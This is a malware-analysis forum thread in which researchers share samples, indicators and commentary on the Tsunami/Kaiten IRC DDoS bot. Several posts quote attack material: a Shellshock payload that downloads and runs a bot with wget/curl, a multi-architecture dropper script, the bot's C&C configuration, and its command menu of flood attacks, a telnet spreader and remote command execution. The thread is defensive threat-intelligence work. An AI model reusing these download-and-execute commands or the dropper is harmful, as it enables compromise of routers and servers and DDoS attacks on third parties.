A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23998  by unixfreaxjp
 Sat Sep 27, 2014 11:47 pm
More: https://www.virustotal.com/en/file/3caf ... 411856827/
#CNC: linksys,secureshellz,net Channel IRC = "#shellshock" < PoC of a designed for ShellShock event

Source: #shellshock attack payloads:
Code: Select all
wget http://stablehost.us/bots/a -O /tmp/a;
curl -o /tmp/a http://stablehost.us/bots/a;
chmod +x /tmp/a;
/tmp/a; 
IRC server:
Code: Select all
#undef STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apache2" // What you want this to hide as
#define CHAN "#shellshock" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=1; // Must change this to equal number of servers down there
char *servers[] = { // List the servers in that format, always end in (void*)0
"linksys.secureshellz.net",
(void*)0
}; 
Attachments
7z/infected
(319.96 KiB) Downloaded 73 times
 #24030  by unixfreaxjp
 Thu Oct 02, 2014 3:20 am
The Tsunami (kaiten)'s "pan" attack is completely revealed, the function's source code was snagged successfully.
Attached is the function's source code, not the whole code.
Shared ONLY to the legit members (which its security we trust is handled by kernelmode management),
for the purpose to mitigate this attack method.

#MalwareMustDie!
Attachments
7z/infected
(2.21 KiB) Downloaded 67 times
 #24138  by K_Mikhail
 Tue Oct 14, 2014 11:32 am
_http://128.199.179.103/private/auto/xtk-ppc-auto
_http://128.199.179.103/private/auto/xtk-mips-auto
_http://128.199.179.103/private/auto/xtk-mipsel-auto
_http://128.199.179.103/private/auto/xtk-x64-auto
_http://128.199.179.103/private/auto/xtk-arm-auto

x86 is absent.
Attachments
pw: infected
(44.21 KiB) Downloaded 58 times
 #24142  by unixfreaxjp
 Tue Oct 14, 2014 1:39 pm
Spotting skids lair with old museum samples..thinking three times before deciding to share here..
Image
https://www.virustotal.com/en/file/de5b ... 413070953/
https://www.virustotal.com/en/file/0732 ... 343929536/
https://www.virustotal.com/en/file/0a32 ... 413293556/
Compiled well for each kernel version, .. 2.7? lol..outdated.
Attachments
7z/infected
(10.63 KiB) Downloaded 58 times
 #26826  by malwarelabs
 Mon Sep 28, 2015 12:15 pm
Good old Tsunami
Vector: SSH bruteforce:
Code: Select all
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
#
# LEGAL DISCLAIMER: It is the end user's responsibility to obey 
# all applicable local, state and federal laws. Developers assume 
# no liability and are not responsible for any misuse or damage 
# caused by this program.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
#
# LEGAL DISCLAIMER: It is the end user's responsibility to obey 
# all applicable local, state and federal laws. Developers assume 
# no liability and are not responsible for any misuse or damage 
# caused by this program.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="hXXp://freshtoastmafia.com"
# NAME OF BINARIES:
REFERENCE_MIPSEL="3"
REFERENCE_MIPS="2"
REFERENCE_SUPERH="5"
REFERENCE_ARM="1"
REFERENCE_PPC="4"
rm -fr /var/run/${REFERENCE_MIPSEL} \
	/var/run/${REFERENCE_MIPS} \
	/var/run/${REFERENCE_SUPERH} \
	/var/run/${REFERENCE_ARM} \
	/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh
hXXp://freshtoastmafia.com -> "NAZI BOOTER" admin : hXXps://twitter.com/ispdestroyer
C&C 80.82.75.56:6667
attached
Attachments
infected
(66.42 KiB) Downloaded 59 times
 #27285  by unixfreaxjp
 Sun Nov 22, 2015 3:11 pm
Too modified, not good. Must make some new memo here. IRC cnc server (plain) & ports (hashed) are well seen as usual in the bins..I go with interesting points only.. Sample:
https://www.virustotal.com/en/file/26ac ... 448201213/
https://www.virustotal.com/en/file/ec6b ... 448201238/
Installer:
Image
shell pong:
Code: Select all
$ echo -e "\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n\r\n"
binfagt'
new help:
Code: Select all
NOTICE %s :PAN <target> <port> <secs>\n
NOTICE %s :Panning %s.\n 
NOTICE %s :TSUNAMI <target> <secs>\n 
NOTICE %s :Tsunami heading for %s.\n 
NOTICE %s :UNKNOWN <target> <secs>\n 
NOTICE %s :Unknowning %s.\n
NOTICE %s :MOVE <server>\n 
NOTICE %s :TSUNAMI <target> <secs>= Special packeter that wont be blocked by most firewalls\n
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n
NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n
NOTICE %s :NTP <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time> = A NTP flooder\n 
NOTICE %s :UNKNOWN <target> <secs>= Another non-spoof udp flooder\n
NOTICE %s :SCAN= TheMaTriX Telnet Spreader\n 
NOTICE %s :HTTPFLOOD <IP> <HOST> <METHOD> <PAGE> <TIME>= TheMaTriX HTTP FLOODER\n
NOTICE %s :NICK <nick>= Changes the nick of the client\n 
NOTICE %s :SERVER <server>= Changes servers\n
NOTICE %s :GETSPOOFS= Gets the current spoofing\n
NOTICE %s :SPOOFS <subnet>= Changes spoofing to a subnet\n 
NOTICE %s :DISABLE= Disables all packeting from this client\n
NOTICE %s :ENABLE = Enables all packeting from this client\n 
NOTICE %s :KILL = Kills the client\n 
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n
NOTICE %s :VERSION= Requests version of client\n 
NOTICE %s :KILLALL= Kills all current packeting\n
NOTICE %s :HELP = Displays this\n
NOTICE %s :IRC <command>= Sends this command to the server\n 
NOTICE %s :SH <command> = Executes a command\n 
Wide varierty of the used user-agent for Ddos attack:
Image
Pan flood attack:
Image
NTP flood attack:
Image
Most important new thing is this telnet scanner:
Image
just saying:
Code: Select all
0x8048A96 mov     dword ptr [esp+4], offset aR ; "r"
0x8048A9E mov     dword ptr [esp], offset aUsrDictWords ; "/usr/dict/words"
0x8048AA5 call    fopen
0x8048AAA mov     [ebp+var_14], eax
0x8048AAD cmp     [ebp+var_14], 0
and..
Code: Select all
NOTICE #Daddy2 :[+] Cracked IP %s with login %s:%s\n 
#MalwareMustDie / @unixfreaxjp
Attachments
7z/infected
(73.18 KiB) Downloaded 53 times
 #27484  by wiseman
 Tue Dec 29, 2015 10:55 am
unixfreaxjp wrote:Most important new thing is this telnet scanner:
Image
just saying:
Code: Select all
0x8048A96 mov     dword ptr [esp+4], offset aR ; "r"
0x8048A9E mov     dword ptr [esp], offset aUsrDictWords ; "/usr/dict/words"
0x8048AA5 call    fopen
0x8048AAA mov     [ebp+var_14], eax
0x8048AAD cmp     [ebp+var_14], 0
and..
Code: Select all
NOTICE #Daddy2 :[+] Cracked IP %s with login %s:%s\n 
#MalwareMustDie / @unixfreaxjp
That's hardly a major improvement over the existing Kaiten. I mean, when you consider that the vast majority of modern *nixes don't even come with telnet out of the box any more...
It's more likely to be a threat against routers or other small embedded devices, but then that'd involve compiling a bunch of different kaitens, etc etc, and with the router malware world heating up with gayfgt and LightAidra and the .xs malware, I can't imagine it's a big deal.
I haven't looked at it yet, but if it's just posting the login details as opposed to auto-spreading, then that's also not a huge risk.
I guess he might be able to own a few unusual embedded devices out there, but if he's using Kaiten in this day and age then he's really only a threat to himself.
 #27547  by unixfreaxjp
 Tue Jan 05, 2016 8:38 am
I don't know who you are. But thank's for the sharing of thought, appreciate it.
wiseman wrote:
unixfreaxjp wrote:Most important new thing is this telnet scanner...
That's hardly a major improvement over the existing Kaiten. .
Oh, I agreed with you perfectly, and I didn't say majorly improved, but they added services bruter/scanner to aim the right spot after all, this I also spotted ones with the SSH bruter too, which is why I called it "important new thing".
IoT weakness of "this and that" made new vectors of "this and that" are seen and aimed. some devices are targeted with this now, and they are compiled in many variants.
wiseman wrote:I guess he might be able to own a few unusual embedded devices out there, but if he's using Kaiten in this day and age then he's really only a threat to himself.
As I jumped within its irc CNC and into some "ugly environment" to trail ELF threat/actors closely. Sadly, I saw hundreds (maybe to couple thousands nodes tops in overall total of groups that's using it like lizard-stresser, kaitenbbot, etc) of DDOS botnets are into routers now, because they have generic flaw. I may say it is close to 50-50 amount of old machines/VPS *vs*the router ones. They use routers/IoT to brute each others' login pwd now and this is the escalation factor that needed to be aware.

So it's not a few anymore, and most of them are by kaiten family. Seriously it hits, not that I'm happy about it. For the code itself .. it grows..to new variants like you mentioned gayfgt (they call it lizkebab..it has at least 6 codes of the now), dtool, and some more. Those kiddos work hard to improve & expand their bruter/ddos service.
I shared its source codes and anything I can grab and distributed them into all security industry I can reach http://blog.malwaremustdie.org/2015/11/ ... osure.html